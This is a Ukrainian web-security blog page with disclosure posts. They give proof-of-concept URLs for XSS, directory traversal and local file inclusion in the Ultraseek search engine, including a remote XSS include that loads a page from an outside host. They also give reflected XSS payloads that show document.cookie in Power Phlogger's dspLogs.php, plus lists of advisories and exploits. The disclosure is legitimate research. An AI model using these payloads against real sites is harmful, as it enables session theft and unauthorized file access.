Websecurity - Веб безпека

Як я нещодавно писав, 12.11.2006, я знайшов ряд уразливостей на websense.com (де раніше використовувався движок Ultraseek). І як я сьогодні перевірив на сайті виробника Verity Ultraseek, дані уразливості мають місце в движку Ultraseek.

Я підтвердив наявність раніше знайдених Cross-Site Scripting, Directory Traversal та Local File Inclusion уразливостей (окрім Full path disclosure) в Ultraseek, а також знайшов чимало нових уразливостей. Про що найближчим часом повідомлю розробникам даного локального пошуковця.

XSS: Remote HTML Include / Remote XSS Include:

http://site/highlight/index.html?url=http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dtest

Directory Traversal:

http://site/help/syntax.html?la=/../../index

http://site/help/searchtips.html?la=/../../index

http://site/help/refine.html?la=/../../index

http://site/help/special.html?la=/../../index

http://site/help/boolean.html?la=/../../index

http://site/help/meta.html?la=/../../index

Local File Inclusion:

http://site/help/syntax.html?la=/../query

http://site/help/searchtips.html?la=/../query

http://site/help/refine.html?la=/../query

http://site/help/special.html?la=/../query

http://site/help/boolean.html?la=/../query

http://site/help/meta.html?la=/../query

Виявлені численні уразливості в Mozilla Firefox, Thunderbird і Seamonkey.

Уразливі версії: Mozilla Firefox 2.0, Thunderbird 2.0, Seamonkey 1.1.

Численні ушкодження пам’яті, підміна фокуса введення, міжсайтовий скриптінг, виконання коду, ушкодження збереженої інформації, зворотний шлях у каталогах, витік інформації, підміна тексту в діалогах.

Дані уразливості були виправлені в останніх версіях Firefox, Thunderbird та Seamonkey.

• Mozilla Foundation Security Advisory 2008-11 (деталі)
• Mozilla Foundation Security Advisory 2008-10 (деталі)
• Mozilla Foundation Security Advisory 2008-09 (деталі)
• Mozilla Foundation Security Advisory 2008-08 (деталі)
• Mozilla Foundation Security Advisory 2008-06 (деталі)
• Mozilla Foundation Security Advisory 2008-05 (деталі)
• Mozilla Foundation Security Advisory 2008-04 (деталі)
• Mozilla Foundation Security Advisory 2008-03 (деталі)
• Mozilla Foundation Security Advisory 2008-02 (деталі)
• Mozilla Foundation Security Advisory 2008-01 (деталі)

06.09.2007

У березні, 27.03.2007, я знайшов Cross-Site Scripting уразливість на http://www.infosecuritymoscow.com - сайті виставки INFOSECURITY MOSCOW. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.02.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.

В даній добірці експлоіти в веб додатках:

• Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vuln (деталі)
• syndeoCMS 2.5.01 (cmsdir) Remote File Inclusion Vulnerability (деталі)
• nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability (деталі)
• Vortex Portal 1.0.42 Remote File Inclusion Vulnerabilities (деталі)
• ASP Message Board 2.2.1c Remote SQL Injection Vulnerability (деталі)
• JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit (деталі)
• jPORTAL 2 mailer.php Remote SQL Injection Vulnerability (деталі)
• jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability (деталі)
• MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability (деталі)
• Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day (деталі)

В минулому році RSnake взяв інтерв’ю у фішера. Котре представив в своєму записі Phishing Social Networking Sites. В даному інтерв’ю мова йшла про фішинг атаки на сайти соціальних мереж (і про нього писали різні онлайн ЗМІ).

Сам фішер спілкувався з RSnake-ом інкогніто, тому намагався про себе особливо не розповідати. Але на інтерв’ю погодився, і відповідав на всі поставлені запитання, тому розкрив деякі нюанси фішинга зі сторони “нападника”. Про що буде цікаво дізнатися як тим хто “захищається” та секюріті спеціалістам, так і всім бажаючим дізнатися більше про тему фішинга.

Громадська організація РОЦИТ з 29 січня по 5 лютого провела разом з російським підрозділом корпорації Microsoft серію заходів під загальною назвою “Тиждень безпечного Рунета”. Акція присвячена до Міжнародного дня безпечного Інтернету, що відмічався цього року 5 лютого.

29 січня були проведені прес-конференція і круглий стіл “Інтернет для дітей: перспективи чи загрози?..”, присвячений проблемам безпеки неповнолітніх у всесвітній павутині. З 30 січня по 5 лютого в рамках “Тижня безпечного Рунета” працювала “Гаряча лінія” з ведучими експертами, що у режимі реального часу відповідали на питання інтернет-користувачів.

Останнім заходом у рамках “Тижня…” стала науково-практична конференція “Загрози людині і суспільству з Інтернету: положення в Росії”, що відбулася 5 лютого. Конференція була присвячена проблемам протистояння інтернет-загроз для людини і суспільства в цілому.

По матеріалам http://www.secblog.info.

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection (деталі)
• SQL Injection Vulnerability in Beehive Forum Software (деталі)
• Cross-site scripting (XSS) vulnerability in Citrix NetScaler 8.0 (деталі)
• Citrix NetScaler Web Management Cookie Weakness (деталі)
• Meganoide’s news v1.1.1 < = RFi Vulnerabilities (деталі)
• Dem_trac acces to log file wihtout authentification (деталі)
• Turuncu Portal v1.0 == SQL Injection Vulnerability (деталі)
• PHP-інклюдинг в Newxooper PHP (деталі)
• TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit (деталі)
• Міжсайтовий скриптінг в opentaps (деталі)
• oftpd: Denial of Service (деталі)
• Виконання довільних команд в TYPO3 (деталі)
• JV2 Folder Gallery 3.0 (download.php) Remote File Disclosure Exploit (деталі)
• Розкриття даних в Mono (деталі)
• Cross-site scripting (XSS) vulnerability in Fastilo 2.0 and Open Solution Quick.Cart 2.0 (деталі)

Ще 18.08.2006 я виявив Cross-Site Scripting уразливості в Power Phlogger, котрий використовує одна українська компанія як основу для власного рахівника. Про що їм у вересні 2006 повідомив і вони виправили уразливості. Хоча і дуже нечемно забули подякувати мені за мою роботу по підвищенню безпеки їх сайтів - не подякували за жоден з моїх листів про численні уразливості на їхніх сайтах (як на сайті з Power Phlogger, так й інших).

XSS:

POST запит на сторінці http://site/dspLogs.php:

"><script>alert(document.cookie)</script>В полях: Host, Referrer, Agent Information, res, colo, online, mp.

Як я перевірив учора, 09.02.2008, дані уразливості були виправлені лише частково - лише в POST запиті, а в GET XSS залишилися. Також окрім Cross-Site Scripting, я виявив Information disclosure уразливості в Power Phlogger. Про що найближчим часом сповіщу розробників веб додатку.

XSS:

http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information disclosure:

На сторінці http://site/index.php (як й інших сторінках додатку) виводиться важлива інформація про систему (версії PHP та MySQL, як і версія веб сервера з його банера) в мета-тегах. Що приводить до витоку важливої інформації.

<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це перша частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Виявлені численні уразливості в Apache Tomcat.

Уразливі версії: Apache Tomcat 4.0, Tomcat 4.1, Tomcat 5.0, Tomcat 5.5, Tomcat 6.0.

Можливий міжсайтовий скриптінг та витік інформації.

• Multiple cross-site scripting (XSS) vulnerabilities in Apache Tomcat (деталі)
• Tomcat information disclosure vulnerability (деталі)

04.09.2007

У березні, 23.03.2007, я знайшов Cross-Site Scripting уразливість на проекті http://infostream.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

10.02.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.